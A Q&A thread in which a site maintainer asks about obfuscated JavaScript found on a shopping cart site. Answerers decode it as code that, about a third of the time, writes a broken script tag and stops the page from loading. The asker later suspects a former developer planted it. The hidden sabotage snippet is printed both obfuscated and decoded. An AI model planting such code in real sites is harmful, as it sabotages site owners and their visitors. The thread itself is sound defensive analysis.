1

I got a call from a friend who has a large shopping cart web site. After a while a page would not load and you had to do a page refresh to show the page.

I'm not a html guy but can fumble around and understand the basics.

I started with firebug and found they were calling a chat service that was failing. I then checked all the web pages that had been altered since the setup of the site and deleted the chat script.

However on the same page I found the following script:

var _0x3fba = [ "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E", "\x77\x72\x69\x74\x65", "\x73\x74\x6F\x70" ]; if ( Math[ _0x3fba[1] ]( ( Math[ _0x3fba[0] ]() * 3 ) + 1 ) == 3 ) { document[ _0x3fba[3] ]( _0x3fba[2] ); window[ _0x3fba[4] ](); };

After some googling I am led to believe this is Obfuscated javascript. We held our breath (it's a large site with lots of traffic) and deleted the above script and the problem went away and the site runs a lot faster.

So the million dollar question is what is this script actually doing.

I tried some online deObfuscaters but got nothing.

Improve this question
8
  • possible duplicate of How to deobfuscate this JavaScript code? Commented Mar 27, 2014 at 17:08
  • 1
    Here's what it decodes to: pastebin.com/kgksrZdA Just replace _0x3fba[X] with its value from the array :-) Commented Mar 27, 2014 at 17:09
  • @Rocket what tool did you use to decode it? Commented Mar 27, 2014 at 17:10
  • 1
    @MikeCheel: jsbeautifier.org (make sure to check the "Unescape printable chars" option) Commented Mar 27, 2014 at 17:10
  • 1
    If your friend doesn't know what it does, then why is it there in the first place? If you don't want it there, then it doesn't matter what it does. Just remove it. Commented Mar 27, 2014 at 17:11

2 Answers 2

Reset to default
1 
if (Math.floor((Math.random() * 3) + 1) == 3) { document.write('<script type="text/undefined">'); window.stop(); }

not very interesting really.

Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

The site probly got hacked and 1/3 of the time, the page "stop" loading.
@Karl-AndréGagnon Out of curiosity, if the site was hacked, is the only way this code could get in is if the hackers had access to that file directly on the server? There shouldn't be anyway to inject and save it to the server without ssh or ftp, correct?
@mister_rampage I am not a good security guy. If you use a CMS, they could have use that to modify the DB or files.
Hi guys, after finding out what it does it looks like an ex developer/ employee has added this code so he can be paid to fix it.......
1

If you execute:

["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E","\x77\x72\x69\x74\x65","\x73\x74\x6F\x70"];

You'll get

["random", "floor", "<script type="text/undefined">", "write", "stop"]

so the code do:

if (Math["floor"]((Math["random"]()*3)+1)==3) { document["write"]('<script type="text/undefined">'); window["stop"](); }

The code, print <script type="text/undefined"> randomly and stop loading the page, maybe it try to crash the page randomly.

Improve this answer

Comments

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.